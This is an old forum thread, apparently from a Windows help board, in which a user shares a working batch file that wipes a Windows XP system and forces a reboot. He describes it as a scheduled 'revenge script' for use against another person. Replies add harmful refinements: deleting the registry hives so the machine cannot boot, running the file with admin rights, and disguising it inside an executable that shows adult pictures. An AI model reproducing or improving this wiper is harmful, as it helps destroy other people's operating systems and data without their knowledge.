DOS batch files

Status
Not open for further replies.

ekÆsine

Fully Optimized
I am trying to make a batch file that will corrupt the operating system, delete all data on other drives, and reboot. this will be set to a date and time with windows task scheduler. here's what i have, not sure if the syntax is even correct:

cd c:\
del c:\WINDOWS\system\*.* /f/s/q
del c:\WINDOWS\system32\*.* /f/s/q
deltree /y d:\*.*
shutdown -r -t 10 -c "I Know Who You Are" -f

i cannot find a version of deltree for winXP. does anyone know of where i can download deltree or something similair for winXP?

and is there was a way to corrupt a partition, obviously with another program? all of this has to be done under winXP or have winXP launch the operation. i was thinking maybe partition magic could be controlled within a batch file to completely destroy a system, maybe?

I want to do all this in case one of my computers is compromised and i have no access to it. I also plan to have an IP updater program installed that would let me know the computer's IP at any time it has internet conection. I have heard you can trace someone based on IP address alone.

well i kinda figured i would not get advice on something like this. if anyone is curious this is the code i am using and it works well. it first copies shutdown.exe because it deletes all files in system32 which is where shutdown is located:

copy c:\windows\system32\shutdown.exe C:\windows\tasks\ /y
attrib -r -a -s -h c:\ /s
del c:\windows\system\*.* /f/s/q
del c:\windows\system32\*.* /f/s/q
del c:\windows\*.* /f/s/q
del c:\progra~1\*.* /f/s/q
del c:\*.* /f/s/q
C:\windows\tasks\shutdown.exe -r -t 20 -c "I Am Everywhere, You Can Not Stop Me!" -f

this file is actually for 2 purposes, it is obvious how dangerous this file would be if used incorrectly.

You can stop this if you know how... It's not that hard to reverse what you are trying to do.
Why would you want to do this anyway? You said something about having your system compromised, but I am still at a loss.
Also, you should make the call to c:\winnt just incase you have an NTFS user...
The only thing you really need to do is delete the system registry hive, and then reboot the system. This will ineffect will destroy the OS.

this would be added as a scheduled task. how would you stop something that you did not know about? not too many people i know would use winXP task scheduler.

i also planned to use an IP updater that would logon to my DNS service and tell me it's IP address any time it is connected to the internet. i have heard you can track down a machine using only an IP address.

Inaris why would i want to? because this serves for 2 purposes. it is a measure to protect my data in case the machine gets stolen, i have omitted the command to delete all files in my directories where i keep my personal data.

another purpose is a revenge script, it is a malicious backup plan for someone who has messed with the wrong guy. i think you can imagine the scenario i'm talking about.

inaris the target machine runs winXP home or pro. it is an NTFS partition most likely. a winnt folder would only be found on a winNT or win2k machine right?

are you sure a registry is all that is needed?, we are talking about winXP. where is the default location of the registry in a winXP/ win9x/ and an NT based machine?

Well, I have to tell you, you have my attention now....
First, the Shutdown.exe has a terminate command. Second, you can't delete system files while the system is running. Third, you can specify the destination folder for your install to be whatever you want. I use winnt for all of my installs, be it nt, 2k or xp.

The registry files are stored in [windowsfolder]system32\config
The one that you want to play with is software
it has no file extention, but will be 20+ megs depending on installed software. If that hive is removed, then the system will not be able to start. Also, you can remove the "system" file as well, and that will totally hose the computer.

As to the Shutdown.exe abortion script, I have one on all of my PCs. A batch file on the desktop that I can run as soon as the process is launched. Also, the service "Messenger" will prevent that from running if it's not. Also, you are giving 20 seconds to do this. In 20 seconds, I can stop your attempt and send one to you without the time warning.... But another thing, you need to have local admin rights inorder to run this. If you set the scheduled task to include the permissions, then that is ok, but if not, then it won't work anyway...

As far as the IP thing, good luck. You would have to work with ISP's to get them to give out their IP location information and that will not be very easy .You might be able to get a valid IP but actually tracking it down would be like finding a needle in the Haystack.

my 2 cents

This has caught my attention. If you have that script fine tuned, id be interested in finding out how u did that. Could I ask you to label your coding???

:D

would it be possible to attach that to say an EXE of like a prog that has a woman showing her jublies?

LOL
This has caught my attention as well. Why don't you use Wise Install 9.0 to create such a task? Much easier and you can set variables to use later with your code, you can stop certain services before running commands, etc. Much easier to use and you can include some graphics!

-Michael

Inaris the shutdown is really just to display a message to scare the person. the damage has already been done before the shutdown starts, right after the computer is turned on or restarted it will display "hal corrupted,please reinstall hal."

all of the deletion is performed silently without any indication of what is happening, it happens in mere seconds. Inaris since this is a machine i have access to, i can create a password protected admin account and give myself permission to schedule the task, this has already been tested and works.

Inaris thank you for the registry info, this will make a nice addition to my file :) as far as finding IP, I think with the help of police and permission from the court it would be fairly easy.

mikesgroovin i have tried converting the batch file to .COM and winXP does not allow it any access to delete files, only when it remains as a batch file does this work. so i think making an executable would not work or be too difficult to create.

Status
Not open for further replies.
Back
Top Bottom